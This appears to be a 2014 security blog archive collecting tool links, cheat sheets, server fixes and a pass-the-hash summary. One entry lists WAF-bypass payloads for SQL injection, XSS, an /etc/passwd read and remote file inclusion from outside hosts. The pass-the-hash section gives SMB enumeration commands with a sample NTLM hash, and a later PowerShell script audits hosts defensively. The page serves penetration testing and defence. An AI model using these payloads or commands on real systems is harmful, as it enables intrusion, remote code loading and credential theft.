Aug 2, 2014

Tools: "Flashbang" - Analysis Flash Script

This tool is an open-source Flash security helper with a very specific purpose: find the flashVars of a naked SWF and display them, so a security tester can start hacking away without decompiling the code.
Flashbang is built on Mozilla's Shumway project. It runs in the browser but has a number of requirements to work properly; see the links below.

Source: https://github.com/cure53/Flashbang


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

CheatSheet: Packet flows in netfilter

Packet flows in netfilter #linux #netfilter #kernel #networking pic.twitter.com/5uXQ6eqmyA


Cheatsheet: Executable and Link Format



https://twitter.com/angealbertini/status/495240082563928066/photo/1


Howto: Fix "/var/lib/nginx/fastcgi/*" failed (13: Permission denied) while reading upstream

When you run a LEMP stack and change the owner of /var/www/ to another account, you also have to change the user nginx runs as in /etc/nginx/nginx.conf (the user directive). Even then, nginx's own working directories under /var/lib/nginx/ can still have the wrong permissions.

The error log will then contain something like: /var/lib/nginx/fastcgi/3/01/0000000013" failed (13: Permission denied) while reading upstream.

Change the owner of those directories to match /var/www. For example, if /var/www/ is owned by webmaster, change the owner of /var/lib/nginx/fastcgi (and the other directories under /var/lib/nginx/) to webmaster as well.

1. chown -R webmaster:webmaster /var/lib/nginx/

2. Restart Nginx

Done.


Aug 1, 2014

Tools: iRET - iOS Reverse Engineering Tool

The iOS Reverse Engineering Toolkit is a toolkit designed to automate many of the common tasks associated with iOS penetration testing. It automates many common tasks, including:
  • binary analysis using otool
  • keychain analysis using keychain_dumper
  • reading database content using sqlite
  • reading log and plist files
  • binary decryption using dumpdecrypted
  • dumping binary headers using class_dump_z
  • creating, editing, installing theos tweaks
Source: https://github.com/S3Jensen/iRET


Jul 31, 2014

Howto: bypass Incapsula and ModSecurity List

SQLi
- /poc.php?Search2=joxy%27%20group%20by%20testzsl%20having%201=1--

XSS
- /poc.php?x=%3C/h2%3E%3Cinput%20onfocus=prompt%28%27ZSL%27%29;%20autofocus%3E
- /poc.php?x=%3C/h2%3E%3Cbody%20oninput=alert%281%29%3E%3Cinput%20autofocus%3E
- /poc.php?x=%3C/h2%3E%3Cobject%20data=%22data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%22%3E%3C/object%3E

LFI/RFI
- /poc.php?cmd2=http://google.com?
- /poc.php?cmd2=cat%20\/etc/\/passwd
- /poc.php?cmd2=http://dni.destr0y.net/x.txt
- /poc.php?cmd2=http://96.8.122.139/x.php?????????


Source: http://www.intelligentexploit.com/articles/CloudFlare-vs-Incapsula-vs-ModSecurity.pdf


Howto: Fix "Error code: sec_error_untrusted_issuer" in Firefox

When testing an HTTPS website with Burp Suite and Firefox, I got "(Error code: sec_error_untrusted_issuer)" and could not open any page of the target website, so I had to add an exception for this certificate in Firefox. This is how to do that.
1. Go to Preferences.

2. Go to the Advanced tab -> Certificates

3. View Certificates

4. Click Add Exception

5. Fill in your target website

6. Get Certificate -> Confirm Security Exception

7. OK

8. Try visiting the website again.


Jul 30, 2014

Pass-the-Hash is Dead: Long Live Pass-the-Hash

Source: http://www.harmj0y.net/blog/penetesting/pass-the-hash-is-dead-long-live-pass-the-hash/  

“Administrators” are no longer able to execute code with WMI or PSEXEC, use schtasks or at, or even browse the open shares on the target machine. The exception is the RID 500 built-in Administrator account, even if it’s renamed. While Windows 7 installs now disable this account by default and prompt the user to set up another local administrator, many organizations, used to the standard advice and compliance, still have loads of RID 500 accounts, enabled, all over their enterprise.


However, when you try to use PSEXEC or WMIS to trigger agents or commands, or use Impacket’s functionality to browse the file shares, you’ll encounter something like this:

The “pth-winexe” example above shows the difference between invalid credentials (NT_STATUS_LOGON_FAILURE) and the new patch behavior. If you happen to have the plaintext, through group policy preferences, some Mimikatz luck, or cracking the dumped NTLM hashes, you can still RDP to a target successfully with something like rdesktop -u mike -p password 192.168.52.151.

If you have PowerShell access on a Windows domain machine, you can try enumerating all the local groups on a target machine with something like:
  • $computer = [ADSI]"WinNT://WINDOWS2,computer"
  • $computer.psbase.children | where { $_.psbase.schemaClassName -eq 'group' } | foreach { ($_.name)[0] }
If you want the members of a specific group, that's not hard either:
  • $members = @($([ADSI]"WinNT://WINDOWS2/Administrators").psbase.Invoke("Members"))
  • $members | foreach { $_.GetType().InvokeMember("ADsPath", 'GetProperty', $null, $_, $null) }
The Nmap scripts smb-enum-groups.nse and smb-enum-users.nse can accomplish the same thing using a valid account for the machine (even a member of local admins!) along with a password or hash:
  • nmap -p U:137,T:139 --script-args 'smbuser=mike,smbhash=8846f7eaee8fb117ad06bdd830b7586c' --script=smb-enum-groups --script=smb-enum-users 192.168.52.151
If you want to use a domain account, set your flags to something like --script-args 'smbdomain=DOMAIN,smbuser=USER,smbpass=X' (or smbhash=X instead of smbpass). You'll be able to enumerate the RID 500 account name and whether it's disabled, as well as all the members of the local Administrators group on the machine. If a returned member of the Administrators group doesn't show up in the smb-enum-users list, like 'Jason' in this instance, it's likely a domain account. This information gives you a better idea of which credentials will work where, and which systems/accounts you need to target.
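As an added example (not code from harmj0y's post or from this blog), the following PowerShell audits a single host for exactly the condition described above: it locates the RID 500 built-in Administrator by its SID rather than its name (so a rename does not hide it), reports whether the account is enabled, and lists the members of the local Administrators group using the same ADSI WinNT provider as the one-liners above. It assumes it runs on the host being audited and that the group is named Administrators (English Windows); Get-Rid500AndAdminAudit is a name chosen here, not a built-in cmdlet.

```powershell
# Added example: audit the local host for an enabled RID 500 Administrator and
# list local Administrators group members (defender-side check for the
# situation harmj0y describes). Uses the ADSI WinNT provider like the post.
function Get-Rid500AndAdminAudit {
    param(
        # Assumption: audit the machine the script runs on.
        [string]$ComputerName = $env:COMPUTERNAME,
        # Assumption: English group name; localized Windows uses another name.
        [string]$AdminGroupName = 'Administrators'
    )

    $computer = [ADSI]"WinNT://$ComputerName,computer"

    # ADS_UF_ACCOUNTDISABLE bit of the WinNT UserFlags property.
    $ACCOUNTDISABLE = 0x2

    $users = $computer.psbase.Children |
        Where-Object { $_.psbase.SchemaClassName -eq 'user' }

    foreach ($user in $users) {
        # Build the SID from the raw objectSid bytes; RID 500 is the built-in
        # Administrator regardless of what the account has been renamed to.
        $sid = New-Object System.Security.Principal.SecurityIdentifier($user.objectSid.Value, 0)
        if ($sid.Value.EndsWith('-500')) {
            $disabled = ($user.UserFlags.Value -band $ACCOUNTDISABLE) -ne 0
            [PSCustomObject]@{
                Check   = 'RID500Account'
                Account = $user.Name.Value
                Sid     = $sid.Value
                Enabled = -not $disabled
            }
        }
    }

    # Members of the local admin group. Domain principals show the domain name
    # instead of the computer name in their ADsPath, which is how the post
    # tells local accounts from domain accounts.
    $group = [ADSI]"WinNT://$ComputerName/$AdminGroupName,group"
    foreach ($member in @($group.psbase.Invoke('Members'))) {
        $path = $member.GetType().InvokeMember('ADsPath', 'GetProperty', $null, $member, $null)
        [PSCustomObject]@{
            Check   = 'LocalAdminMember'
            Account = $path
            Sid     = $null
            Enabled = $null
        }
    }
}

# Usage: run on each host and collect the rows; an 'RID500Account' row with
# Enabled = True is the case the post says still allows pass-the-hash.
Get-Rid500AndAdminAudit | Format-Table -AutoSize
```

Run it under an account that can read the local SAM (a local administrator); a host returning Enabled = True for the RID 500 row is one where the KB2871997-era restriction described above does not help, and disabling that account (or confirming it has a unique, managed password) is the fix.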

Video: Hack in Paris 2014

Link: https://www.youtube.com/playlist?list=PL3UAg9Zuj1yLmemIKw-domjg5UkbN-pLc


Tools: Wlister - Web application firewall designed to whitelist and/or blacklist HTTP requests.

wlister is a web application firewall (WAF) that protects web applications by whitelisting and by attack signatures. The former quickly validates an authorized, well-formed request; the latter detects known attack patterns in HTTP requests.
Using wlister it is possible to apply either method or to combine them at will.
wlister lets you describe the interactions between the web application and the client, using each piece of an HTTP request and their combinations as potential validation points (URI, parameters, headers, content, method, protocol, ...).

Source:  https://github.com/etombini/wlister


Video: Recon 2014

Link: http://recon.cx/2014/video/


CheatSheet: SQL Join


Jul 29, 2014

Tools: WAPMap - Convert .netxml files output by Kismet to Google Map Engine


Usage: ./wap_mapper.py <Kismet.netxml File> <Mode> <Output File Name>
Example: ./wap_mapper.py /root/Kismet-20140725-22-33-53-1.netxml -wep wep_networks.csv
This example parses the provided .netxml file and outputs a CSV file of WEP networks for upload to Google Maps Engine.

Source:
http://www.shortbus.ninja/wardriving-with-kismet-and-wapmap/
https://github.com/hack1thu7ch/WAPMap


CheatSheet: SQLMap from Packetstorm



Source: http://packetstorm.foofus.com/papers/cheatsheets/sqlmap-cheatsheet-1.0-SDB.pdf


Jul 28, 2014

Article: Analysis of Instagram (from 2012)

Link: https://db.tt/RJgoVhEJ


Jul 27, 2014

News: Syscan360 conference slides are available for download.

http://www.syscan360.org/en/schedule.html
